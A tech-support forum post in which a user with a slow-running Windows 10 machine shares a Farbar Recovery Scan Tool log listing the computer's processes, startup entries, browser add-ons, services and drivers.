Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Real Slow start and run

Started by mktlawoffice , Jun 23 2016 09:12 AM

  • Please log in to reply

#1
mktlawoffice
Posted 23 June 2016 - 09:12 AM

mktlawoffice

    Member

  • Member
  • PipPip
  • 10 posts
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-06-2016 01
Ran by mkt (administrator) on MKTOFFICE (23-06-2016 10:08:57)
Running from D:\Desktop
Loaded Profiles: mkt (Available Profiles: mkt & John & Mark)
Platform: Windows 10 Pro Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(HP) C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Code 42 Software) C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
(Sage) C:\Windows\SysWOW64\TSSchBkpService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\Essentials\WseClientMonitorSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\Essentials\EssentialsTrayApp.exe
() C:\Users\mkt\AppData\Roaming\Dashlane\Dashlane.exe
() C:\Users\mkt\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Serverdata.net, Inc.) C:\Users\mkt\AppData\Roaming\Intermedia Communications\CallScape\CSTrayApp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\GROOVE.EXE
(Code 42 Software, Inc.) C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Farbar) D:\Desktop\FRST64 (1).exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [EssentialsTrayApp] => C:\WINDOWS\System32\Essentials\EssentialsTrayApp.exe [306688 2015-07-09] (Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-03-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CrashPlanTray] => C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe [461184 2016-05-04] (Code 42 Software, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2313408 2016-04-07] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [1867448 2016-05-27] (Adobe Systems Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [Dashlane] => C:\Users\mkt\AppData\Roaming\Dashlane\Dashlane.exe [227200 2016-06-03] ()
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [DashlanePlugin] => C:\Users\mkt\AppData\Roaming\Dashlane\DashlanePlugin.exe [286080 2016-06-03] ()
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe [882872 2016-05-27] (Adobe Systems Incorporated)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [Lync] => "C:\Program Files\Microsoft Office 15\Root\Office15\lync.exe" /fromrunkey
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [CallScape] => C:\Users\mkt\AppData\Roaming\Intermedia Communications\CallScape\CSTrayApp.exe [404424 2015-11-11] (Serverdata.net, Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-04-22] (Apple Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [1084688 2016-04-21] (Apple Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2016-04-22] (Apple Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2016-04-22] (Apple Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [TIDAL] => [X]
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\Run: [GoogleChromeAutoLaunch_598809936090EC4DB9B2489A0B976A0D] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [941720 2016-06-15] (Google Inc.)
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\MountPoints2: {0d623c24-b66e-11e5-a09e-8086f2d77bfb} - "M:\VZW_Software_upgrade_assistant.exe" 
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2015-12-21]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2015-12-21]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2015-12-21]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2015\QBW32.EXE (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Vista Fax Daemon.lnk [2015-12-21]
ShortcutTarget: Vista Fax Daemon.lnk -> C:\Program Files (x86)\Common Files\ImageMAKER\Vstdaemon.exe (ImageMAKER Development Inc.)
Startup: C:\Users\mkt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive for Business.lnk [2016-03-19]
ShortcutTarget: OneDrive for Business.lnk -> C:\Program Files\Microsoft Office\root\Office16\GROOVE.EXE (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.11.1
Tcpip\..\Interfaces\{30cc0a70-0dd6-4e08-90a5-c4fc77436de1}: [DhcpNameServer] 192.168.11.1
Tcpip\..\Interfaces\{c2110df6-1250-4b0c-88c5-a1358f2bd251}: [DhcpNameServer] 192.168.11.1
 
Internet Explorer:
==================
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://minnesota.tylerhost.net/
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://signon.thomsonreuters.com/?productid=CBT&viewproductid=CBT&lr=0&culture=en-US&returnto=https%3a%2f%2f1.next.westlaw.com%2fCosi%2fSignOn&tracetoken=0107161140040V2wTjLhAnRe0svcG5phSb-XrdCRPRadxEWV_eHSGtKRuOuUDq74ecSfcAhCtzBVmmdQ9YtgsxqXI5DiIT1JYB32EEE99f7zKVNi7d-7MOo--I4pCA-EIADgtpa_F8w2VKxwBSMTzVQKJc4SoYYsCgOScZ9q_gGovuMI89Rf27CCdwrlgNqDQstUwhmE3pnf04fnW4dSjWbGxFGK7G24f57RhmOHFSSsi5RBjvPIm9mfy6BdaW1hQPFWPq5jAvCl-H4eXd7zXZSDwaqZRFrFNyGC1lLlRi1MDekWiw0Yu0QFvq3BMx8mJDyQFrEy23uNd&bhcp=1
hxxp://pa.courts.state.mn.us/CaseDetail.aspx?CaseID=1617318641
hxxps://www.revisor.mn.gov/court_rules/
hxxps://mblsportal.sos.state.mn.us/
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2016-06-10] (Microsoft Corporation)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-06-10] (Microsoft Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-06-10] (Microsoft Corporation)
BHO-x32: TBSB02679 Class -> {39A4E6C4-E11A-456B-99DA-E4A530C18A0D} -> C:\Program Files (x86)\mbraceToolbar\tbcore3.dll [2011-02-03] ()
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\mkt\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-06-03] (Dashlane)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-06-10] (Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - mbrace Toolbar - {BFE88941-E3D1-45BA-B574-0F47901AE17F} - C:\Program Files (x86)\mbraceToolbar\tbcore3.dll [2011-02-03] ()
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2015-09-30] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\mkt\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-06-03] (Dashlane)
Toolbar: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125 -> No Name - {BFE88941-E3D1-45BA-B574-0F47901AE17F} -  No File
DPF: HKLM-x32 {8F2EACD9-51A6-4915-B9AD-2AA8657CB472} hxxps://print.stamps.com/webpostage/resources/plugin/SdcWebClientServices.cab
Handler-x32: intu-help-qb8 - {CD17C364-2EC8-4929-91A9-C4839A20E909} - C:\Program Files (x86)\Intuit\QuickBooks 2015\HelpAsyncPluggableProtocol.dll [2015-12-07] (Intuit, Inc.)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\system32\mscoree.dll [2015-10-30] (Microsoft Corporation)
 
Edge: 
======
Edge Session Restore: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125 -> is enabled.
 
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-06-10] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-04-07] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-06-10] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-06-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-20] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2016-05-27] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-12-21] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-04-07] (Adobe Systems)
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat DC - Create PDF - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn [2016-02-18]
 
Chrome: 
=======
CHR Profile: C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-20]
CHR Extension: (YouTube) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-20]
CHR Extension: (QuickBooks) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\cimncnjihlhfmagneecomiloklpjeagl [2015-12-20]
CHR Extension: (Google Search) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-20]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\ddaloccgjfibfpkalenodgehlhkgoahe [2015-12-20]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\djcfdncoelnlbldjfhinnjlhdjlikmph [2016-06-11]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2015-12-21]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdjamakpfbbddfjaooikfcpapjohcfmg [2016-06-22]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnbdnhhicmebfgdgglcdacdapkcihcoh [2016-06-08]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-06-01]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2015-12-20]
CHR Extension: (Hootsuite) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\kneloppijbcidgidihgdjnooihjcdbij [2015-12-20]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\maffnemieclgahnalopfngbddfhneghd [2016-06-03]
CHR Extension: (Web Store) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndjpnladcallmjemlbaebfadecfhkepb [2016-04-08]
CHR Extension: (OneDrive) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\nffchahhjecejoiigmnhhicpoabngedk [2016-04-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\mkt\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-20]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [694464 2016-04-07] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021592 2016-04-05] (Adobe Systems, Incorporated)
S4 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2944768 2016-06-10] (Microsoft Corporation)
R2 CrashPlanService; C:\Program Files (x86)\CrashPlan\CrashPlanService.exe [220032 2016-05-04] (Code 42 Software)
S3 HP DS Service; C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe [13824 2011-10-17] (Hewlett-Packard Company) [File not signed]
R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [164864 2012-05-02] (HP) [File not signed]
S2 JPLAYService; c:\JPLAY\jplay.exe [208384 2015-07-24] () [File not signed]
S2 JPLAYStreamer; c:\JPLAY\JPLAYStreamer.exe [1553920 2015-07-28] () [File not signed]
S3 Media Center 21 Service; C:\Program Files (x86)\J River\Media Center 21\JRService.exe [398584 2016-02-22] (JRiver, Inc.)
R2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [50688 2014-11-17] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [66048 2014-11-17] (Hewlett-Packard) [File not signed]
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2015-12-07] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2014-12-06] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2014-12-06] (Intuit Inc.) [File not signed]
S4 QuickBooksDB25; C:\Program Files (x86)\Intuit\QuickBooks 2015\QBDBMgrN.exe [827392 2014-12-06] (Intuit, Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-08-04] (Realtek Semiconductor)
S3 ServiceProviderRegistry; C:\Windows\System32\Essentials\ProviderRegistryService.exe [35840 2015-07-10] (Microsoft Corporation)
R2 TSScheduleBackup; C:\WINDOWS\SysWOW64\TSSchBkpService.exe [738608 2014-06-09] (Sage)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56040 2015-11-19] (Microsoft Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S3 WseClientMgmtSvc; C:\Windows\System32\Essentials\SharedServiceHost.exe [24576 2015-07-10] (Microsoft Corporation)
R3 WseClientMonitorSvc; C:\Windows\System32\Essentials\WseClientMonitorSvc.exe [54784 2015-07-10] (Microsoft Corporation)
S3 WseHealthSvc; C:\Windows\System32\Essentials\SharedServiceHost.exe [24576 2015-07-10] (Microsoft Corporation)
S3 WseNtfSvc; C:\Windows\System32\Essentials\SharedServiceHost.exe [24576 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
S3 HPEWSFXBULK; C:\Windows\system32\drivers\hpfx64bulk.sys [29240 2015-10-28] (Hewlett Packard)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [263952 2015-07-14] (Intel Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [193336 2015-07-10] (Intel Corporation)
R3 NETwNb64; C:\Windows\System32\drivers\Netwbw02.sys [3485696 2015-10-30] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [935168 2015-11-24] (Realtek                                            )
R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [216064 2015-10-30] (Microsoft Corporation)
S3 SonyAmplifier; C:\Windows\system32\DRIVERS\SonyUDAC.SYS [579584 2015-12-21] (C-Media Inc.)
